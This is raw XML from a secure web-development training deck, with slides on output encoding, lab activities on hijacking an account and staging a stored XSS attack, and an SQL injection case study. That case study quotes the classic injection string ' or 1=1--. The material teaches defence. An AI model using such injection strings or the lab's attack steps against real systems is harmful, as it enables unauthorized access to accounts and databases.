          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{A8160BDD-7155-D744-B749-9730458604AD}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>94</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8"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hecklist png">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1E89FB15-B182-4C00-865F-AE6C4511E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183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Image result for web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0000">
            <a:off x="142991" y="1087872"/>
            <a:ext cx="1272484" cy="12724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Prepare Web Content for Output</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1905000" y="1307130"/>
            <a:ext cx="6897076" cy="4935408"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>To prepare content for output:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Perform encoding only on trusted systems, such as a server.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Use standard, tested functions for outbound encoding.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Appropriately encode all data that originated outside the application's trust boundary, before you send it to the client.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Encode all characters unless they are known to be safe for the intended interpreter.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Contextually sanitize all output of untrusted data to queries for SQL, XML, and LDAP.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Sanitize all output of untrusted data to operating system commands.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95</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Picture 2" descr="Image result for shiel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84" y="1930611"/>
            <a:ext cx="82126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checklist png">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{893C7DE3-1412-49AA-8CF9-3C0FF1AC4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52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96</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>A combination of defects can make some attacks possible that might not be possible if only one of the defects were present.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>In this activity, you will use a combination of defects to hijack another user's account, changing his password in the process. Operating like an attacker, you will:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Figure out that the Catalog app uses REST APIs to communicate with the server by examining network communications in the browser. These APIs can be called directly, bypassing the user interface.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Figure out how to access the function that changes the user's password outside of the intended user interface by using evidence provided by the application, combined with a little guesswork.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Log in to another user's account without knowing his password, by using an SQL injection attack.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Access a REST function directly to change the user's password without having to provide the old password.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Title 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Activity: Protecting Sensitive Data and Functions</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59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97</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>In some cases, an attacker might not be able to directly access the account of another user to gain access to the user's elevated privileges.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Without the user's elevated privileges, there might be some tasks the attacker can't perform.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>However, the attacker might find a way to have the user perform the attack for him.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>In this activity, you will view how you can perform a cross-site request forgery (CSRF) attack to cause the administrator's privileged web client to call a JavaScript function when the administrator loads a particular page.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Title 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Activity: Staging a Persisted XSS Attack </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>on an Administrator Function</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3624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9447F-832C-47CE-A8E5-39DB022B6B2A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{A8160BDD-7155-D744-B749-9730458604AD}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>98</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6488E8C0-2EFC-4F8D-AECB-74DA11ECAC4E}"/>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FD899051-3F3C-4C01-83A8-408DD72C6D60}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="14"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Protect Database Access </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3474949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99</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="341925" y="1302040"/>
            <a:ext cx="6863945" cy="4920960"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The Defect</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>' or 1=1--   </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Attacker provides malformed input that hijacks an SQL statement to perform unintended tasks.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>SQL query is created directly from user input—for example, from form input or URL query string.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Attacker can type SQL in their input to gain far more direct control over the database than you intended. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Possible Consequences</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Essentially compromises the entire database.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>An attacker:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Can use this as a vector for attacks on other systems.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>May be able to read sensitive data not meant for public access.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>May be able to tamper with data.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>May be able to access data protected by regulations, leaving you and your organization open to legal problems.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Can use this to deliver malware, compromising other servers and the network.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Title 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Case Study: SQL Injection Defect (Slide 1 of 3)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2050" name="Picture 2" descr="Image result for sql injecti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001" y="4873044"/>
            <a:ext cx="1691074" cy="1691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496642"/>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Template>
  <TotalTime>508</TotalTime>
  <Words>11535</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>On-screen Show (4:3)</PresentationFormat>
  <Paragraphs>1040</Paragraphs>
  <Slides>110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Courier New</vt:lpstr>
      <vt:lpstr>CNX</vt:lpstr>
      <vt:lpstr>Implementing Common Protections</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Web Sessions</vt:lpstr>
      <vt:lpstr>Secure Session Management</vt:lpstr>
      <vt:lpstr>Methods for Passing Session IDs (Slide 1 of 3)</vt:lpstr>
      <vt:lpstr>Methods for Passing Session IDs (Slide 2 of 3)</vt:lpstr>
      <vt:lpstr>Methods for Passing Session IDs (Slide 3 of 3)</vt:lpstr>
      <vt:lpstr>Access Control</vt:lpstr>
      <vt:lpstr>Provide Secure Authentication (Slide 1 of 4)</vt:lpstr>
      <vt:lpstr>Provide Secure Authentication (Slide 2 of 4)</vt:lpstr>
      <vt:lpstr>Provide Secure Authentication (Slide 3 of 4)</vt:lpstr>
      <vt:lpstr>Provide Secure Authentication (Slide 4 of 4)</vt:lpstr>
      <vt:lpstr>Provide Secure Access Control (Slide 1 of 4)</vt:lpstr>
      <vt:lpstr>Provide Secure Access Control (Slide 2 of 4)</vt:lpstr>
      <vt:lpstr>Provide Secure Access Control (Slide 3 of 4)</vt:lpstr>
      <vt:lpstr>Provide Secure Access Control (Slide 4 of 4)</vt:lpstr>
      <vt:lpstr>Provide Secure Session Management (Slide 1 of 4)</vt:lpstr>
      <vt:lpstr>Provide Secure Session Management (Slide 2 of 4)</vt:lpstr>
      <vt:lpstr>Provide Secure Session Management (Slide 3 of 4)</vt:lpstr>
      <vt:lpstr>Provide Secure Session Management (Slide 4 of 4)</vt:lpstr>
      <vt:lpstr>User Provisioning</vt:lpstr>
      <vt:lpstr>Password Recovery (Slide 1 of 5) </vt:lpstr>
      <vt:lpstr>Password Recovery (Slide 2 of 5)</vt:lpstr>
      <vt:lpstr>Password Recovery (Slide 3 of 5)</vt:lpstr>
      <vt:lpstr>Password Recovery (Slide 4 of 5)</vt:lpstr>
      <vt:lpstr>Password Recovery (Slide 5 of 5)</vt:lpstr>
      <vt:lpstr>Account Lockouts (Slide 1 of 2)</vt:lpstr>
      <vt:lpstr>Account Lockouts (Slide 2 of 2)</vt:lpstr>
      <vt:lpstr>Provide Secure Password Management (Slide 1 of 2)</vt:lpstr>
      <vt:lpstr>Provide Secure Password Management (Slide 2 of 2)</vt:lpstr>
      <vt:lpstr>Activity: Handling Authentication and Authorization Defects</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Encryption (Slide 1 of 3)</vt:lpstr>
      <vt:lpstr>Encryption (Slide 2 of 3)</vt:lpstr>
      <vt:lpstr>Encryption (Slide 3 of 3)</vt:lpstr>
      <vt:lpstr>Uses for Encryption</vt:lpstr>
      <vt:lpstr>Cryptographic Lifecycle</vt:lpstr>
      <vt:lpstr>Symmetric Encryption</vt:lpstr>
      <vt:lpstr>Symmetric Encryption Example</vt:lpstr>
      <vt:lpstr>Asymmetric Encryption</vt:lpstr>
      <vt:lpstr>Asymmetric Encryption Example</vt:lpstr>
      <vt:lpstr>Hashing</vt:lpstr>
      <vt:lpstr>Digital Signatures</vt:lpstr>
      <vt:lpstr>Digital Signature Non-repudiation</vt:lpstr>
      <vt:lpstr>Digital Certificates (Slide 1 of 2)</vt:lpstr>
      <vt:lpstr>Digital Certificates (Slide 2 of 2)</vt:lpstr>
      <vt:lpstr>PKI</vt:lpstr>
      <vt:lpstr>PKI Components</vt:lpstr>
      <vt:lpstr>The PKI Process</vt:lpstr>
      <vt:lpstr>Key Management</vt:lpstr>
      <vt:lpstr>Key Management Factors</vt:lpstr>
      <vt:lpstr>Certificate Revocation</vt:lpstr>
      <vt:lpstr>Protect Data in Transit and at Rest (Slide 1 of 4)</vt:lpstr>
      <vt:lpstr>Protect Data in Transit and at Rest (Slide 2 of 4)</vt:lpstr>
      <vt:lpstr>Protect Data in Transit and at Rest (Slide 3 of 4)</vt:lpstr>
      <vt:lpstr>Protect Data in Transit and at Rest (Slide 4 of 4)</vt:lpstr>
      <vt:lpstr>Manage Encryption Keys (Slide 1 of 4)</vt:lpstr>
      <vt:lpstr>Manage Encryption Keys (Slide 2 of 4)</vt:lpstr>
      <vt:lpstr>Manage Encryption Keys (Slide 3 of 4)</vt:lpstr>
      <vt:lpstr>Manage Encryption Keys (Slide 4 of 4)</vt:lpstr>
      <vt:lpstr>Activity: Protecting Data in Transit and at Rest</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Error Handling</vt:lpstr>
      <vt:lpstr>Uses for Error Handling (Slide 1 of 2)</vt:lpstr>
      <vt:lpstr>Uses for Error Handling (Slide 2 of 2)</vt:lpstr>
      <vt:lpstr>Error Messaging (Slide 1 of 2)</vt:lpstr>
      <vt:lpstr>Error Messaging (Slide 2 of 2)</vt:lpstr>
      <vt:lpstr>Logging</vt:lpstr>
      <vt:lpstr>Implement Error Handling (Slide 1 of 2)</vt:lpstr>
      <vt:lpstr>Implement Error Handling (Slide 2 of 2)</vt:lpstr>
      <vt:lpstr>Implement Logging (Slide 1 of 4)</vt:lpstr>
      <vt:lpstr>Implement Logging (Slide 2 of 4)</vt:lpstr>
      <vt:lpstr>Implement Logging (Slide 3 of 4)</vt:lpstr>
      <vt:lpstr>Implement Logging (Slide 4 of 4)</vt:lpstr>
      <vt:lpstr>Display Error Messages</vt:lpstr>
      <vt:lpstr>Activity: Reviewing Error Handling</vt:lpstr>
      <vt:lpstr>Activity: Improving Error Handling</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Sensitive Data</vt:lpstr>
      <vt:lpstr>Output Restrictions</vt:lpstr>
      <vt:lpstr>Function Level Access Control</vt:lpstr>
      <vt:lpstr>Case Study: Cross-Site Scripting Defect (Slide 1 of 6)</vt:lpstr>
      <vt:lpstr>Case Study: Cross-Site Scripting Defect (Slide 2 of 6)</vt:lpstr>
      <vt:lpstr>Case Study: Cross-Site Scripting Defect (Slide 3 of 6)</vt:lpstr>
      <vt:lpstr>Case Study: Cross-Site Scripting Defect (Slide 4 of 6)</vt:lpstr>
      <vt:lpstr>Case Study: Cross-Site Scripting Defect (Slide 5 of 6)</vt:lpstr>
      <vt:lpstr>Case Study: Cross-Site Scripting Defect (Slide 6 of 6)</vt:lpstr>
      <vt:lpstr>Protect Sensitive Data (Slide 1 of 4)</vt:lpstr>
      <vt:lpstr>Protect Sensitive Data (Slide 2 of 4)</vt:lpstr>
      <vt:lpstr>Protect Sensitive Data (Slide 3 of 4)</vt:lpstr>
      <vt:lpstr>Protect Sensitive Data (Slide 4 of 4)</vt:lpstr>
      <vt:lpstr>Protect Sensitive Functions (Slide 1 of 3) </vt:lpstr>
      <vt:lpstr>Protect Sensitive Functions (Slide 2 of 3)</vt:lpstr>
      <vt:lpstr>Protect Sensitive Functions (Slide 3 of 3)</vt:lpstr>
      <vt:lpstr>Prepare Web Content for Output</vt:lpstr>
      <vt:lpstr>Activity: Protecting Sensitive Data and Functions</vt:lpstr>
      <vt:lpstr>Activity: Staging a Persisted XSS Attack  on an Administrator Function</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Case Study: SQL Injection Defect (Slide 1 of 3)</vt:lpstr>
      <vt:lpstr>Case Study: SQL Injection Defect (Slide 2 of 3)</vt:lpstr>
      <vt:lpstr>Case Study: SQL Injection Defect (Slide 3 of 3)</vt:lpstr>
      <vt:lpstr>Query Parameterization (Slide 1 of 3)</vt:lpstr>
      <vt:lpstr>Query Parameterization (Slide 2 of 3)</vt:lpstr>
      <vt:lpstr>Query Parameterization (Slide 3 of 3)</vt:lpstr>
      <vt:lpstr>Database Connection Credential Protection (Slide 1 of 2)</vt:lpstr>
      <vt:lpstr>Database Connection Credential Protection (Slide 2 of 2)</vt:lpstr>
      <vt:lpstr>Guidelines for Protecting Database Access (Slide 1 of 2)</vt:lpstr>
      <vt:lpstr>Guidelines for Protecting Database Access (Slide 2 of 2)</vt:lpstr>
      <vt:lpstr>Activity: Protecting Database Access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Common Protections</dc:title>
  <dc:creator>Brian Sullivan</dc:creator>
  <cp:lastModifiedBy>Michelle Farney</cp:lastModifiedBy>
  <cp:revision>17</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2020-03-16T19:15:42Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2020-04-07T14:03:34Z</dcterms:modified>
</cp:coreProperties>
</file>